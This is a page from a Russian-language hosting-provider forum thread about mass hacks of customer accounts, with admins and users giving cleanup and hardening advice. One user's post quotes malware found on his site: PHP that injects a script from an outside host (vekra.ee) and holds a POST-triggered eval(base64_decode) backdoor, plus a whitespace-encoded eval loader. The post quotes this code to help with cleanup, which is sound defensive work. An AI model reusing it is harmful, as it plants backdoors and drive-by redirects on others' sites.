FreeHost.com.UA
Сентября 21, 2018, 12:48:19 am *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Новости: Распродажа серверов http://freehost.com.ua/forum/index.php?topic=2093.0
 
   Начало   Помощь Поиск Войти Регистрация  
Страниц: 1 2 3 [4]
  Печать  
Автор Тема: Масовые взломы акаунтов - почему они происходят?  (Прочитано 18450 раз)
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #45 : Февраля 28, 2012, 06:56:08 pm »

1. Сайты в одном акаунте или нет? Если да, то достаточно одного уязвимого, чтобы взломать все сайты акаунта.
2. Изучать access и error-логи HTTP, если внимательно изучить - вы обязательно найдете где происходит обращение к шеллу или выполняется потенциально опасный запрос.
3. Написать на техподдержку с указанием логина и подробным описанием происходящего - возможно с нашей стороны что-либо посмотрим.
Записан

Lucy in the Sky with Diamonds
SPEC1AL1ST
Newbie
*

Karma: 0
Сообщений: 6


Просмотр профиля E-mail
« Ответ #46 : Февраля 29, 2012, 11:46:35 am »

http://clip2net.com/s/1E7XH
Вот даже в корне хостинга появляется.
« Последнее редактирование: Февраля 29, 2012, 12:10:08 pm от SPEC1AL1ST » Записан
AMBA
Hero Member
*****

Karma: 2
Сообщений: 955



Просмотр профиля E-mail
« Ответ #47 : Февраля 29, 2012, 04:30:20 pm »

Специалист, самое первое это надо перестать паниковать, а далее изничтожить гадину. Могу подсказать примерно такие действия:
1. Сменить пароли на доступ по фтп;
2. Ограничить доступ по фтп по ip;
3. Открыть "зараженный" php файл и изучить что именно дописывается, скопировать себе вариант этого вредоносного кода куда-то в блокнот, а из зараженного файла код вырезать и сохранить файл.
4. Пройтись поиском по всем фалам, используя для поиска разные части кода из найденного вами зараженного фрагмента (обычно это замысловатые имена переменных), все найденные зараженные файлы пофиксить также как и первый;
5. Если заражено очень много файлов, и вручную вы не в состоянии все их обработать, а у вас стоит какой-то стандартный движок без существенных модификаций, можно заменить большую часть файлов чистыми файлами из дистрибутива;
6. Если у вас не очень большой трафик на сайте, то посмотрев http лог доступа можно и самому найти к каким файлам в последние сутки был доступ и проверить эти файлы на наличие шелл кода.
7. Если вы нашли добавленный "левый" файл, не относящийся к вашему сайту, вы также поискав по имени этого файла в http логе доступа можете найти с какого ip к нему был доступ, вероятнее всего это ip злоумышленника который открывал свой шелл. Для разнообразия можно закрыть доступ с этого адреса (адресов) на ваш хст;
8. Если ничего не получается, напишите запорс в сапорт, укажите подробно с какими аккаунтами проблемы и попросите сапорт помочь вам вычистить файлы или найти уязвимость.
Записан
tourdnepr
Newbie
*

Karma: 0
Сообщений: 1


Просмотр профиля WWW
« Ответ #48 : Апреля 08, 2012, 02:32:56 pm »

На хостинге с января 2010 года.

В сентябре 2011 года в файлы был добавлен код, который рассылал спам (пример одного из них):

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

Все изменяемые файлы были проверены и вредоносный код был удален.
Усилил бдительность и всевозможные средства безопасности.


С конца декабря 2011 и весь января 2012, почти каждый день добавлялись файлы в каталог root и в корень сайта с названиями типа w86675434t.php, w29744403w.php, w27826508w.php, о чем сообщалось в службу поддержки.

С моей стороны принимались все доступные методы безопасности:
1)Пароль  доступа ftp в клиентах не сохраняю, каждый день менял.
2)Включал ограничение доступа по Ip.
3)В панели управления - Настройка PHP - отключал все потенциально опасные функции PHP кроме mail.
4)Практически на все папки стоят права 755, на файлы 644.
4)Файлы CMS были проверены на изменения с оригинальным дистрибутивом, а впоследствии и заменены на них. В самих файлах постоянно контролирую дату изменения файлов.

Все перечисленные способы не помогали.
В феврале 2012 файлы перестали добавляться

8 апреля обнаружил, что 7 апреля на мой сайт были добавлены два файла один в каталог root рядом с каталогом www.tourdnepr.com, второй в корень сайта в каталог www.tourdnepr.com. Постороний файл с названием pagenews.php и содержимым: (удалил только большое количество пробелов)
<?php   $d="
";
$s=substr(0,1);for($i=0;$i<5032;$i=$i+8){$s.=chr(bindec(str_replace(chr(9),1,str_replace(chr(32),0,substr($d,$i,8)))));}eval($s);?>

Сайт находится на s11.
Также сайты с такой CMS находятся на s22 и на других хостингах например hvosting.ua и у них таких проблем нет.

Когда данную проблему начнут воспринимать всерьез?

Я не вижу полной картины на всех серверах хостинга, но по отзывам форума и своим сайтам у меня складывется мнение, что проблема имено в 11 сервере.

Принимаются ли какие-нибудь способы устранения проблемы:
1)анализ настроек на других серверах где нет подобных проблем
2)перенос отдельных клиентов на другие сервера
3)...

--------------------------------------

Давно уже разобрался в чем проблема, вот сейчас нашел время описать.
Проблема как и писали тут была в вредоносном коде который был вставлен в файлы сайта, но самый интересный вопрос как этого избежать. Оказывается если вы устанавливаете модули или компоненты стандартно из под самой CMS то владельцем добавленных файлов становится сама CMS и в эти файлы и внедряют вредоносный код. Во избежании этого, надо зайти в https://admin.freehost.com.ua/ и через  Управление сайтом -> Корректировка прав ФТП пользователя изменить принадлежность установленных файлов. Если файлы уже заражены то их надо заменить на оригинальные из дистрибутива. В моем случае устанавливал модуль mod_flowplayer и через некоторое время начали появляться сторонние файлы. Найдя пораженные файлы заменил их оригинальными из установочного архива модуля и сменил права через админ панель admin.freehost.com.ua. Уже несколько месяцев никаких проблем не наблюдается.
Надеюсь все выше изложенное поможет предотвратить или очистить сайт от вредоносного кода.

на картинке показано что владелец файлов  mod_flowplayer  является 80, тогда как владельцем остальных файлов является 2194


« Последнее редактирование: Июня 30, 2012, 11:41:32 am от tourdnepr » Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #49 : Апреля 09, 2012, 07:25:08 am »

Проблема не в 11 сервере. Проблема скорее всего в том, что вам один раз залили php-shell в какую-то из директорий, и периодически через него заливают файлы.
Обратите внимание, что все php-процессы выполняются только от владельца акаунта, поэтому запись в ваш домашний каталог может производить только ваш же логин и процессы, от него запущеные.
Попробуйте не только сверить файлы с дистрибутивом, а и проверить наличие посторонних - не существующих в дистрибутиве файлов. Ну и естественно обновить CMS до последних версий - включая сторонние модули и патчи, зачастую именно в них, в сторонних модулях, и находят подобные уязвимости.
« Последнее редактирование: Апреля 09, 2012, 07:27:12 am от Komintern » Записан

Lucy in the Sky with Diamonds
Дети Хоронят Коня
Newbie
*

Karma: 0
Сообщений: 4


Если не за что сражаться, лучше сразу умереть!


Просмотр профиля
« Ответ #50 : Мая 03, 2012, 02:22:04 pm »

http://nazamok.com - весьма перспективный сервис для отслеживания внедрения в пользовательскую часть сайта различного рода "вирусов".
Записан

Вспомни молодость - поиграйся в Героев Меча и Магии онлайн
Страниц: 1 2 3 [4]
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2006-2011, Simple Machines Valid XHTML 1.0! Valid CSS!